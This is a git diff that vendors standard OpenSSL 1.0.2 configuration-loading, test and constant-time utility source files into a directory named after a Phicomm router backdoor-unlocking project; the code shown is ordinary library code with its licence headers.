+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/dso.h>
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+/*
+ * This is the automatic configuration loader: it is called automatically by
+ * OpenSSL when any of a number of standard initialisation functions are
+ * called, unless this is overridden by calling OPENSSL_no_config()
+ */
+
+static int openssl_configured = 0;
+
+void OPENSSL_config(const char *config_name)
+{
+    if (openssl_configured)
+        return;
+
+    OPENSSL_load_builtin_modules();
+#ifndef OPENSSL_NO_ENGINE
+    /* Need to load ENGINEs */
+    ENGINE_load_builtin_engines();
+#endif
+    /* Add others here? */
+
+    ERR_clear_error();
+    if (CONF_modules_load_file(NULL, config_name,
+                               CONF_MFLAGS_DEFAULT_SECTION |
+                               CONF_MFLAGS_IGNORE_MISSING_FILE) <= 0) {
+        BIO *bio_err;
+        ERR_load_crypto_strings();
+        if ((bio_err = BIO_new_fp(stderr, BIO_NOCLOSE)) != NULL) {
+            BIO_printf(bio_err, "Auto configuration failed\n");
+            ERR_print_errors(bio_err);
+            BIO_free(bio_err);
+        }
+        exit(1);
+    }
+
+    return;
+}
+
+void OPENSSL_no_config()
+{
+    openssl_configured = 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_sap.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_sap.o
new file mode 100644
index 0000000000000000000000000000000000000000..5a7c7ec7c578ede3e533bb85532877b691dc787e
GIT binary patch
literal 2608
zcmbuA&2JM|5WvSal(YpCpe>bBfh$!A1S~f611dmHB0G*`#V8>N4rR5m*TKTxb$8#E
zq!r|V5-F;X_$Rn=;D*G7h^UZbC9b`oUV17*NT}jN>CD?V%kygY#7J*v=J#ga_j|ik
zsaLa^46tP2EWG!a0^IxPy<L`O8S=0LUhdrY`sNu4g3fGh_1!;Y%TH<ZK@siR>c7%m
zUR$b4qxQRuFTD!A)jw*>YvSwL>XX{7?<l#nrYfEf=!Y~cNq$;ir*5BYrD&q-0Hc9$
z3r*K)cjg1n5*^nmw5?9pZhZnUF+Tod;o$6C;E14b$~a*ZkCuK2q+7aiyl51^JrrVW
zY73TOEY$YI)GTBH)`;b>kbD*@$ox7DnT6rZ$o6eRw{Z+#BL7O&T_Zh}A7063=kr6O
zkEy+rs&1#!X^N(^1zv0>)#nm-hQ`LD8_ded*$guBa&mTqd^@@sEuQAgl7nq*4(J>V
z4fyQj;A1u;y<b{#$0Ei?4z$Ci;5VpuYx9+BitGdyTF<ylB1q!x6#h#Jzm>x8r0}~b
z{C*05l)|5;@V`>{Gvu^Bye`qXqB~&vR^MoX+qWIx@0xrq>=qdH@gg+NRi<WU>WYIo
zQE!Zm*3Cw>I#W4so*x~nSIj7=>sl>yF6eYc$1!_uE9lxjRHmoRX4ken)Al^qgYm{x
zl`Bn|(Z;(c!=%^r7W=|Aec^SSc^`by!aNw8Y?zLH&20Cj*~d!JmPyhK+xBH$+p}%3
z7dj#um*evIaU~!+L3m%~DSopV%5GU3vOL;v72m6IT07<kG*0J<`7w>}()jm^Q@_*~
z$A?d1*zX>VH?(+snxgm%iqpNLH-_7}tntq^PUo70;=jPc@qL0Q#A%MquM<S!_4!Y&
zLqXDzQyt4`We}sn=L`&gu_vrK)WQq(6}CLPYZ<~`5MZ<{VSzE{`(Su3ITT(pN?<hI
zUe9(g#Bqgf;1he)7gqDC^5>nv=zDl@J+X+X)S!LEY<pJE=8=7vE?_#nvGEtDjErO@
zRMD4Wbs0g2*0!uev^NN%oKy*)qD>~hko12bq4PyN{$f9-$^?n`e*|Nw&3OKX%2mUN
zT8jH6tf4lKM-idH`7}RWxPR7VtR%ar2ciA9@(;&2=dq@Dnr%Hap9B+PFCnA9k$zUG
zone(<AV(8ke?~u}L80;dqROvvpwjXDF7l-P=L5y-Li<mDLC)v>PwJbxT2TF8R0E^`
lF_m~ewHe=gMDVAAFUiqFH5(CnyOQ#Y>O%Y$MTSN^|9>OYOL+hQ

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/keysets.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/keysets.pl
new file mode 100644
index 0000000..50ed67f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/keysets.pl
@@ -0,0 +1,185 @@
+#!/usr/local/bin/perl
+
+$NUMBER=0x01;
+$UPPER=0x02;
+$LOWER=0x04;
+$UNDER=0x100;
+$PUNCTUATION=0x200;
+$WS=0x10;
+$ESC=0x20;
+$QUOTE=0x40;
+$DQUOTE=0x400;
+$COMMENT=0x80;
+$FCOMMENT=0x800;
+$EOF=0x08;
+$HIGHBIT=0x1000;
+
+foreach (0 .. 255)
+	{
+	$v=0;
+	$c=sprintf("%c",$_);
+	$v|=$NUMBER	if ($c =~ /[0-9]/);
+	$v|=$UPPER	if ($c =~ /[A-Z]/);
+	$v|=$LOWER	if ($c =~ /[a-z]/);
+	$v|=$UNDER	if ($c =~ /_/);
+	$v|=$PUNCTUATION if ($c =~ /[!\.%&\*\+,\/;\?\@\^\~\|-]/);
+	$v|=$WS		if ($c =~ /[ \t\r\n]/);
+	$v|=$ESC	if ($c =~ /\\/);
+	$v|=$QUOTE	if ($c =~ /['`"]/); # for emacs: "`'}/)
+	$v|=$COMMENT	if ($c =~ /\#/);
+	$v|=$EOF	if ($c =~ /\0/);
+	$v|=$HIGHBIT	if ($c =~/[\x80-\xff]/);
+
+	push(@V_def,$v);
+	}
+
+foreach (0 .. 255)
+	{
+	$v=0;
+	$c=sprintf("%c",$_);
+	$v|=$NUMBER	if ($c =~ /[0-9]/);
+	$v|=$UPPER	if ($c =~ /[A-Z]/);
+	$v|=$LOWER	if ($c =~ /[a-z]/);
+	$v|=$UNDER	if ($c =~ /_/);
+	$v|=$PUNCTUATION if ($c =~ /[!\.%&\*\+,\/;\?\@\^\~\|-]/);
+	$v|=$WS		if ($c =~ /[ \t\r\n]/);
+	$v|=$DQUOTE	if ($c =~ /["]/); # for emacs: "}/)
+	$v|=$FCOMMENT	if ($c =~ /;/);
+	$v|=$EOF	if ($c =~ /\0/);
+	$v|=$HIGHBIT	if ($c =~/[\x80-\xff]/);
+
+	push(@V_w32,$v);
+	}
+
+print <<"EOF";
+/* crypto/conf/conf_def.h */
+/* Copyright (C) 1995-1998 Eric Young (eay\@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay\@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ * 
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh\@cryptsoft.com).
+ * 
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay\@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from 
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh\@cryptsoft.com)"
+ * 
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ * 
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* THIS FILE WAS AUTOMAGICALLY GENERATED!
+   Please modify and use keysets.pl to regenerate it. */
+
+#define CONF_NUMBER		$NUMBER
+#define CONF_UPPER		$UPPER
+#define CONF_LOWER		$LOWER
+#define CONF_UNDER		$UNDER
+#define CONF_PUNCTUATION	$PUNCTUATION
+#define CONF_WS			$WS
+#define CONF_ESC		$ESC
+#define CONF_QUOTE		$QUOTE
+#define CONF_DQUOTE		$DQUOTE
+#define CONF_COMMENT		$COMMENT
+#define CONF_FCOMMENT		$FCOMMENT
+#define CONF_EOF		$EOF
+#define CONF_HIGHBIT		$HIGHBIT
+#define CONF_ALPHA		(CONF_UPPER|CONF_LOWER)
+#define CONF_ALPHA_NUMERIC	(CONF_ALPHA|CONF_NUMBER|CONF_UNDER)
+#define CONF_ALPHA_NUMERIC_PUNCT (CONF_ALPHA|CONF_NUMBER|CONF_UNDER| \\
+					CONF_PUNCTUATION)
+
+#define KEYTYPES(c)		((unsigned short *)((c)->meth_data))
+#ifndef CHARSET_EBCDIC
+#define IS_COMMENT(c,a)		(KEYTYPES(c)[(a)&0xff]&CONF_COMMENT)
+#define IS_FCOMMENT(c,a)	(KEYTYPES(c)[(a)&0xff]&CONF_FCOMMENT)
+#define IS_EOF(c,a)		(KEYTYPES(c)[(a)&0xff]&CONF_EOF)
+#define IS_ESC(c,a)		(KEYTYPES(c)[(a)&0xff]&CONF_ESC)
+#define IS_NUMBER(c,a)		(KEYTYPES(c)[(a)&0xff]&CONF_NUMBER)
+#define IS_WS(c,a)		(KEYTYPES(c)[(a)&0xff]&CONF_WS)
+#define IS_ALPHA_NUMERIC(c,a)	(KEYTYPES(c)[(a)&0xff]&CONF_ALPHA_NUMERIC)
+#define IS_ALPHA_NUMERIC_PUNCT(c,a) \\
+				(KEYTYPES(c)[(a)&0xff]&CONF_ALPHA_NUMERIC_PUNCT)
+#define IS_QUOTE(c,a)		(KEYTYPES(c)[(a)&0xff]&CONF_QUOTE)
+#define IS_DQUOTE(c,a)		(KEYTYPES(c)[(a)&0xff]&CONF_DQUOTE)
+#define IS_HIGHBIT(c,a)		(KEYTYPES(c)[(a)&0xff]&CONF_HIGHBIT)
+
+#else /*CHARSET_EBCDIC*/
+
+#define IS_COMMENT(c,a)		(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_COMMENT)
+#define IS_FCOMMENT(c,a)	(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_FCOMMENT)
+#define IS_EOF(c,a)		(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_EOF)
+#define IS_ESC(c,a)		(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_ESC)
+#define IS_NUMBER(c,a)		(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_NUMBER)
+#define IS_WS(c,a)		(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_WS)
+#define IS_ALPHA_NUMERIC(c,a)	(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_ALPHA_NUMERIC)
+#define IS_ALPHA_NUMERIC_PUNCT(c,a) \\
+				(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_ALPHA_NUMERIC_PUNCT)
+#define IS_QUOTE(c,a)		(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_QUOTE)
+#define IS_DQUOTE(c,a)		(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_DQUOTE)
+#define IS_HIGHBIT(c,a)		(KEYTYPES(c)[os_toascii[a]&0xff]&CONF_HIGHBIT)
+#endif /*CHARSET_EBCDIC*/
+
+EOF
+
+print "static unsigned short CONF_type_default[256]={";
+
+for ($i=0; $i<256; $i++)
+	{
+	print "\n\t" if ($i % 8) == 0;
+	printf "0x%04X,",$V_def[$i];
+	}
+
+print "\n\t};\n\n";
+
+print "static unsigned short CONF_type_win32[256]={";
+
+for ($i=0; $i<256; $i++)
+	{
+	print "\n\t" if ($i % 8) == 0;
+	printf "0x%04X,",$V_w32[$i];
+	}
+
+print "\n\t};\n\n";
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/ssleay.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/ssleay.cnf
new file mode 100644
index 0000000..ed33af6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/ssleay.cnf
@@ -0,0 +1,78 @@
+#
+# This is a test configuration file for use in SSLeay etc...
+#
+
+init = 5
+in\#it1 =10
+init2='10'
+init3='10\''
+init4="10'"
+init5='='10\'' again'
+
+SSLeay::version = 0.5.0
+
+[genrsa]
+default_bits	= 512
+SSLEAY::version = 0.5.0
+
+[gendh]
+default_bits	= 512
+def_generator	= 2
+
+[s_client]
+cipher1		= DES_CBC_MD5:DES_CBC_SHA:DES_EDE_SHA:RC4_MD5\
+cipher2		= 'DES_CBC_MD5 DES_CBC_SHA DES_EDE_SHA RC4_MD5'
+cipher3		= "DES_CBC_MD5 DES_CBC_SHA DES_EDE_SHA RC4_MD5"
+cipher4		= DES_CBC_MD5 DES_CBC_SHA DES_EDE_SHA RC4_MD5
+
+[ default ]
+cert_dir	= $ENV::HOME/.ca_certs
+
+HOME		= /tmp/eay
+
+tmp_cert_dir	= $HOME/.ca_certs
+tmp2_cert_dir	= thisis$(HOME)stuff
+
+LOGNAME	= Eric Young (home=$HOME)
+
+[ special ]
+
+H=$HOME
+H=$default::HOME
+H=$ENV::HOME
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+
+RANDFILE		= $HOME/.rand
+
+[ req ]
+default_bits		= 512
+default_keyfile 	= privkey.pem
+
+Attribute_type_1	= countryName
+Attribute_text_1	= Country Name (2 letter code)
+Attribute_default_1	= AU
+
+Attribute_type_2	= stateOrProvinceName
+Attribute_text_2	= State or Province Name (full name)
+Attribute_default_2	= Queensland
+
+Attribute_type_3	= localityName
+Attribute_text_3	= Locality Name (eg, city)
+
+Attribute_type_4	= organizationName
+Attribute_text_4	= Organization Name (eg, company)
+Attribute_default_4	= Mincom Pty Ltd
+
+Attribute_type_5	= organizationalUnitName
+Attribute_text_5	= Organizational Unit Name (eg, section)
+Attribute_default_5	= TR
+
+Attribute_type_6	= commonName
+Attribute_text_6	= Common Name (eg, YOUR name)
+
+Attribute_type_7	= emailAddress
+Attribute_text_7	= Email Address
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/test.c
new file mode 100644
index 0000000..cc1efcc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/test.c
@@ -0,0 +1,97 @@
+/* crypto/conf/test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/conf.h>
+#include <openssl/err.h>
+
+main()
+{
+    LHASH *conf;
+    long eline;
+    char *s, *s2;
+
+#ifdef USE_WIN32
+    CONF_set_default_method(CONF_WIN32);
+#endif
+    conf = CONF_load(NULL, "ssleay.cnf", &eline);
+    if (conf == NULL) {
+        ERR_load_crypto_strings();
+        printf("unable to load configuration, line %ld\n", eline);
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+    lh_stats(conf, stdout);
+    lh_node_stats(conf, stdout);
+    lh_node_usage_stats(conf, stdout);
+
+    s = CONF_get_string(conf, NULL, "init2");
+    printf("init2=%s\n", (s == NULL) ? "NULL" : s);
+
+    s = CONF_get_string(conf, NULL, "cipher1");
+    printf("cipher1=%s\n", (s == NULL) ? "NULL" : s);
+
+    s = CONF_get_string(conf, "s_client", "cipher1");
+    printf("s_client:cipher1=%s\n", (s == NULL) ? "NULL" : s);
+
+    printf("---------------------------- DUMP ------------------------\n");
+    CONF_dump_fp(conf, stdout);
+
+    exit(0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/constant_time_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/constant_time_locl.h
new file mode 100644
index 0000000..c786aea
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/constant_time_locl.h
@@ -0,0 +1,211 @@
+/* crypto/constant_time_locl.h */
+/*-
+ * Utilities for constant-time cryptography.
+ *
+ * Author: Emilia Kasper (emilia@openssl.org)
+ * Based on previous work by Bodo Moeller, Emilia Kasper, Adam Langley
+ * (Google).
+ * ====================================================================
+ * Copyright (c) 2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_CONSTANT_TIME_LOCL_H
+# define HEADER_CONSTANT_TIME_LOCL_H
+
+# include "e_os.h"              /* For 'inline' */
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+/*-
+ * The boolean methods return a bitmask of all ones (0xff...f) for true
+ * and 0 for false. This is useful for choosing a value based on the result
+ * of a conditional in constant time. For example,
+ *
+ * if (a < b) {
+ *   c = a;
+ * } else {
+ *   c = b;
+ * }
+ *
+ * can be written as
+ *
+ * unsigned int lt = constant_time_lt(a, b);
+ * c = constant_time_select(lt, a, b);
+ */
+
+/*
+ * Returns the given value with the MSB copied to all the other
+ * bits. Uses the fact that arithmetic shift shifts-in the sign bit.
+ * However, this is not ensured by the C standard so you may need to
+ * replace this with something else on odd CPUs.
+ */
+static inline unsigned int constant_time_msb(unsigned int a);
+
+/*
+ * Returns 0xff..f if a < b and 0 otherwise.
+ */
+static inline unsigned int constant_time_lt(unsigned int a, unsigned int b);
+/* Convenience method for getting an 8-bit mask. */
+static inline unsigned char constant_time_lt_8(unsigned int a,
+                                               unsigned int b);
+
+/*
+ * Returns 0xff..f if a >= b and 0 otherwise.
+ */
+static inline unsigned int constant_time_ge(unsigned int a, unsigned int b);
+/* Convenience method for getting an 8-bit mask. */
+static inline unsigned char constant_time_ge_8(unsigned int a,
+                                               unsigned int b);
+
+/*
+ * Returns 0xff..f if a == 0 and 0 otherwise.
+ */
+static inline unsigned int constant_time_is_zero(unsigned int a);
+/* Convenience method for getting an 8-bit mask. */
+static inline unsigned char constant_time_is_zero_8(unsigned int a);
+
+/*
+ * Returns 0xff..f if a == b and 0 otherwise.
+ */
+static inline unsigned int constant_time_eq(unsigned int a, unsigned int b);
+/* Convenience method for getting an 8-bit mask. */
+static inline unsigned char constant_time_eq_8(unsigned int a,
+                                               unsigned int b);
+/* Signed integers. */
+static inline unsigned int constant_time_eq_int(int a, int b);
+/* Convenience method for getting an 8-bit mask. */
+static inline unsigned char constant_time_eq_int_8(int a, int b);
+
+/*-
+ * Returns (mask & a) | (~mask & b).
+ *
+ * When |mask| is all 1s or all 0s (as returned by the methods above),
+ * the select methods return either |a| (if |mask| is nonzero) or |b|
+ * (if |mask| is zero).
+ */
+static inline unsigned int constant_time_select(unsigned int mask,
+                                                unsigned int a,
+                                                unsigned int b);
+/* Convenience method for unsigned chars. */
+static inline unsigned char constant_time_select_8(unsigned char mask,
+                                                   unsigned char a,
+                                                   unsigned char b);
+/* Convenience method for signed integers. */
+static inline int constant_time_select_int(unsigned int mask, int a, int b);
+
+static inline unsigned int constant_time_msb(unsigned int a)
+{
+    return 0 - (a >> (sizeof(a) * 8 - 1));
+}
+
+static inline unsigned int constant_time_lt(unsigned int a, unsigned int b)
+{
+    return constant_time_msb(a ^ ((a ^ b) | ((a - b) ^ b)));
+}
+
+static inline unsigned char constant_time_lt_8(unsigned int a, unsigned int b)
+{
+    return (unsigned char)(constant_time_lt(a, b));
+}
+
+static inline unsigned int constant_time_ge(unsigned int a, unsigned int b)
+{
+    return ~constant_time_lt(a, b);
+}
+
+static inline unsigned char constant_time_ge_8(unsigned int a, unsigned int b)
+{
+    return (unsigned char)(constant_time_ge(a, b));
+}
+
+static inline unsigned int constant_time_is_zero(unsigned int a)
+{
+    return constant_time_msb(~a & (a - 1));
+}
+
+static inline unsigned char constant_time_is_zero_8(unsigned int a)
+{
+    return (unsigned char)(constant_time_is_zero(a));
+}
+
+static inline unsigned int constant_time_eq(unsigned int a, unsigned int b)
+{
+    return constant_time_is_zero(a ^ b);
+}
+
+static inline unsigned char constant_time_eq_8(unsigned int a, unsigned int b)
+{
+    return (unsigned char)(constant_time_eq(a, b));
+}
+
+static inline unsigned int constant_time_eq_int(int a, int b)
+{
+    return constant_time_eq((unsigned)(a), (unsigned)(b));
+}
+
+static inline unsigned char constant_time_eq_int_8(int a, int b)
+{
+    return constant_time_eq_8((unsigned)(a), (unsigned)(b));
+}
+
+static inline unsigned int constant_time_select(unsigned int mask,
+                                                unsigned int a,
+                                                unsigned int b)
+{
+    return (mask & a) | (~mask & b);
+}
+
+static inline unsigned char constant_time_select_8(unsigned char mask,
+                                                   unsigned char a,
+                                                   unsigned char b)
+{
+    return (unsigned char)(constant_time_select(mask, a, b));
+}
+
+static inline int constant_time_select_int(unsigned int mask, int a, int b)
+{
+    return (int)(constant_time_select(mask, (unsigned)(a), (unsigned)(b)));
+}
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif                          /* HEADER_CONSTANT_TIME_LOCL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/constant_time_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/constant_time_test.c
new file mode 100644
index 0000000..d313d0c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/constant_time_test.c
@@ -0,0 +1,304 @@
+/* crypto/constant_time_test.c */
+/*-
+ * Utilities for constant-time cryptography.
+ *
+ * Author: Emilia Kasper (emilia@openssl.org)
+ * Based on previous work by Bodo Moeller, Emilia Kasper, Adam Langley
+ * (Google).
+ * ====================================================================
+ * Copyright (c) 2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
